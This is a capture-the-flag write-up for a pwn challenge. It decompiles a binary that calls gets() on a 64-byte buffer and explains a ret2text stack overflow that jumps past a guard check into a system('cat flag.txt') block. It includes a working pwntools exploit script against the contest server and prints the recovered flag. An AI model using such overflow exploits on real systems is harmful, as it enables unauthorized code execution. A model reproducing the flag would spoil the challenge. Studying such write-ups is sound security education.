Tags: ret2text pwn
Rating:
IDA decompile:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(void) {
setbuf(stdout, NULL);
char input[64];
volatile int give_flag = 0;
puts("hi, how can i help?");
gets(input);
if (strcmp(input, "give me the flag") == 0) {
puts("lol no");
} else if (strcmp(input, "please give me the flag") == 0) {
puts("no");
} else if (strcmp(input, "help, i have no idea how to solve this") == 0) {
puts("L");
} else if (strcmp(input, "may i have the flag?") == 0) {
puts("not with that attitude");
} else if (strcmp(input, "please please please give me the flag") == 0) {
puts("i'll consider it");
sleep(15);
if (give_flag) {
puts("ok here's your flag");
system("cat flag.txt");
} else {
puts("no");
}
} else {
puts("sorry, i didn't understand your question");
exit(1);
}
}
```
Simple ret2text. `gets()` has no length limit, so the line overflows the 64-byte `input` buffer, while `strcmp()` only compares up to the first NUL byte: a payload that starts with the exact phrase followed by `'\0'` still takes the "please please please" branch, and everything after the NUL keeps overflowing the stack. The flag branch is guarded only by `give_flag`, so rather than satisfying the check we skip it: take the address of the `puts("ok here's your flag")` block from IDA (graph mode) and return into it. The address (`0x40128E`) can be hardcoded because the binary is loaded at a fixed address (not PIE). The padding has to reach the saved return address; the script below uses 72 bytes (written as 64+4+4), which is the distance from the start of `input` to the return address for this binary. That distance depends on how the compiler laid out the frame, so confirm it from the IDA stack view or with a cyclic pattern under gdb rather than by counting variables. Note that `main()` only returns, and therefore the flag only prints, after the 15-second `sleep()`. The following exploit script can be constructed:
```py
from pwn import *
# context(log_level='debug',os='linux',arch='amd64')

# The phrase plus '\0' satisfies strcmp(); gets() keeps reading past the NUL,
# so the 'a' padding and the address still land on the stack.
# 64+4+4 = 72 bytes of padding reach the saved return address;
# 0x40128E is the puts("ok here's your flag") block (binary is not PIE).
payload = b'please please please give me the flag\0'.ljust(64+4+4,b'a')+p64(0x40128E)
p = remote('lac.tf',31180)
p.sendline(payload)
# main() only returns after the 15 s sleep(), so the flag shows up with a delay
p.interactive()
# lactf{hey_stop_bullying_my_bot_thats_not_nice}
```